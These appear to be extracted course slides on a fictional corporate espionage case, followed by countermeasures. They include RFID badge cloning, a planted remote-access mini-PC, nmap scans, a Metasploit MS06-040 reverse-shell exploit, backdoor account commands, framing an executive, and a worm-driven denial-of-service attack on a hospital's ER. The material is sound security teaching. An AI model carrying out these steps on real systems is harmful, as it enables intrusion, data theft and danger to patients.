Tel 283Corporate Espionage

Comptetitor of Alki Pharmaceuticals wants to get any technical information or research

Not have the hack traced back Launch a disabling attack on the hospital

across from Alki◦ Critical services impacted, resulting in patient

death “Contractor” threatened hacker’s girlfriend

◦ Eight weeks allowed for the hack

Background

1999$25 Billion◦ US Chamber of Commerce survey

2003$89 Billion from the Fortune 1000 companies◦ Pricewaterhouse Coopers and ASIS survey

(American Society for Industrial Security) 2007$100 Billion plus

Cost of corporate espionage

Reconnaissance Physical Access Executing the Hacks DoS of Hospital Other “stuff”

The Exploit

Google search◦ “intext:alki pharmaceuticals”

Mentions software vendor for Alki Get info from vendor’s webpage

Technical documentation Type of servers Ports Technical forum

SA from Alki complaining about software’s restrictions

Physical recon◦ Employees have RFID badges

www.sec.gov◦ EDGAR search on publicly traded corporations

Recon

Python libraries for reading RFID devices Readers are available for purchase

◦ Depending on standard, anywhere from $50 to $1000

A writer will clone a valid RFID device Phoenix met official of Alki

◦ Got physically close enough to read her badge◦ Now has access to every place the CFO is allowed

RFIDIOt

CFO takes “prospective employee” on tour◦ Observes which areas are carded◦ Reads cards of 15 employees

Remembering the order of cards being read and locations

◦ Will attempt to get a janitor’s RFID card as well

Social engineering

Mini-PC with Vista◦ VMWare

Running Knoppix Live CD ISO◦ Integrated CDMA-EVO cellular card◦ Integrated 10/100 Ethernet NIC

Phoenix hopes to plant the mini-PC physically at Alki◦ Get IP via DHCP◦ Connect to Internet using the cellular card

Using Hotmail account traceable back to Alki employee (backup email account points back to the employee)◦ Set up GoToMyPC trial account

Physical intrusion set for when janitors start night services

Tools

Phoenix takes elevator (using cloned CFO’s card) and enters the NOC room◦ Uses card to enter the NOC room

No biometrics in place!◦ Racks are neatly labeled indicating which units

are R&D switches

Intrusion

Phoenix plugs patch cable into an open port on R&D switch◦ Attaches the mini-PC to the switch

Gets an IP via DHCP Boots up the Knoppix Live CD ISO under VMWare

Ifconfig reveals a supplied IP address of 10.0.0.6 Going back to the host OS (Vista), he fires up the

CDMA software GoToMyPC is connected to the Internet

◦ Secretes the mini-PC and the power supply◦ Takes a wireless access point, with an Alki

inventory control tag and leaves

Intrusion

On the train going home Phoenix uses a CDMA connection on his laptop to verify a connection◦ Brings up a web browser◦ Utilizing the CFO’s bogus account, logs into

www.gotomypc.com◦ Connects to the planted mini-PC in the Alki NOC

room

Intrusion

On returning home, reconnects using GoToMyPC◦ Goes to the VMWare and in the shell starts up Nmap

nmap 10.0.0.0/24◦ Shows the hosts and which ports are listening on

these hosts 10.0.0.14

Shows port 12345, which was the port the R&D server listens on (info developed through passive intel gathering)

nmap –A 10.0.0.14 –p 12345 Attempts to uncover the OS

Response is either XP / SP2 or Windows Server 2003 Directory Services ports are open

Probably Windows Server 2003 host

Intrusion

Recalling complaints about vendor’s software being incapable of working with SP1◦ www.microsoft.com/security

Search for SP1 fixes MS06-040 netapi32.dll ex;oitable

Uses Metasploit to see if there’s an available exploit

use windows/smb/ms06_040_netapi◦ Gets the Metasploit prompt

msf exploit(ms06_040_netapi)>

Intrusion

At the Metasploit promptset PAYLOAD generic/shell_reverse_tcpset RHOST 10.0.0.14set LHOST 10.0.0.6

Phoenix now sees the following on his screen

C:\WINDOWS\system32> Phoenix has access to the target system!

Metasploit

Phoenix is on the target system with Local System privilege◦ Higher that Administrator!!!

Once on the target system Phoenix enters the following commands at the prompt◦ net user linda alki$$ /ADD

(Linda is the CFO)◦ net localgroup administrators linda /ADD

Intrusion: Target Access

Phoenix walks into the hospital and locates a room with available Ethernet plugs near the ER◦ gets IP address◦ Plugs in the stolen Alki wireless access point◦ Resets the AP to factory defaults

Configures it to support DHCP◦ Verifies that he can connect via the AP◦ Jacks the laptop into Ethernet port

Runs nmap 10.10.10.0/24 Response is 12 hosts

Possibly all in ER due to proximity Maps out the OS on each host

Results go to ADS text file Nmap -A 10.10.10.0/24 > c:\OSDetect.txt:ads.txt

Intrusion: Hospital

The laptop was purchased with cash with false information supplied at a computer “superstore”◦ Laptop loaded with viruses, virus construction kit, recon

tools, etc Using the laptop

◦ Phoenix logged into the Hotmail account (posing as CFO from Alki) Leaving the “remember me” settings on

Making investigators’ job easier

◦ Sent/received emails asking for help on scanning, creating viruses and exploiting unpatched PCs

◦ Visited websites, leaving history on PC Verifies that the rouge access point functions from

outside the hospital

Intrusion: Hospital

R&D server partitions mapped out◦ C: system partition◦ D: data partition, shared by researchers

Over a network connection a network share is established to a 1TB drive attached◦ Windows “Backup” of D: target system to the 1 TB

drive Physical entry back into Alki NOC room

◦ Using the mini-PC and Remote Desktop Data partition deleted from D: Windows system directory deleted from C:

Intrusion: Alki

From coffee shop next to the hospital, Phoenix uses Remote Desktop to connect to the mini-PC in the hospital and executes “wshwc.exe”◦ Windows Scripting Host Worm Construction

program

DoS: Hospital

WSHWC◦ Names the work Alkibot◦ Payload option: Launch Denial of Service Attack◦ Creates a separate worm for each of the 7 Unix

(Solaris) hosts identified using nmap These .vbs files, along with 5 additional .vbs files for

the other Windows boxes are saved in the laptop Bat file constructed to execute the .vbs files

sequentially◦ Executes the bat file

DoS: Hospital

News reports◦ ER monitoring units (Solaris systems) were not

able to send data out Resulted in cardiac arrest of 1 patient Incorrect medication prescribed to another patient Drips ran out for two other patients

◦ Alki executive arrested (CFO)◦ Alki stock value sharply down◦ Alki competitor announced they were ahead of

schedule in release of drug

DoS: Hospital

Breach of confidentiality of employee information

Creation of backdoors, shell account◦ Sell these

Access to Alki’s banking information (Accounting dept.)

Stock manipulation

Other options

Detailed tech info of Alki software uncovered by going to vendor’s site

RFID attack assisted in gaining physical access to Alki◦ Bolstered by social engineering

Nmap scan identified Alki R&D server Microsoft.com used to uncover potential exploits for the

server Metasploit used to invoke the exploit Windows Backup used to copy R&D data remotely using

network share Delete of data (getting rid of evidence, causing diversion) Hotmail account set up to implicate CFO Set up rogue AP in hospital, lauched DoS attack

Summary

Physical security◦ Single factor access to restricted areas

Implement multi-layer measures◦ Note: Encryption of the RFID means nothing if it’s

cloned as the attacker does not need to “read” the data, just use it

◦ Cameras / CCTV should be used◦ Access device should not also be the ID card

ID card is visible, RFID device should be in a shielded carrier

◦ Disable open ports on a switch

Countermeasures

Scanning attack◦ Turn off ICMP◦ Turn on Windows Firewall

Simple nmap scans would come back with no results Possible to get results, just more complex scans

◦ Client IDS Cisco Security Agent (CSA)

Detects SYN stealth scans, for example Perhaps make it impossible to determine which host

was the R&D server

Countermeasures

Social Engineering◦ Training!◦ Policies◦ Testing of policies

OS attacks◦ Patching

Pressure vendor to fix application to work with later release of OS which is patched

Consider another software solution (dump the vendor)

Data theft◦ encryption

Countermeasures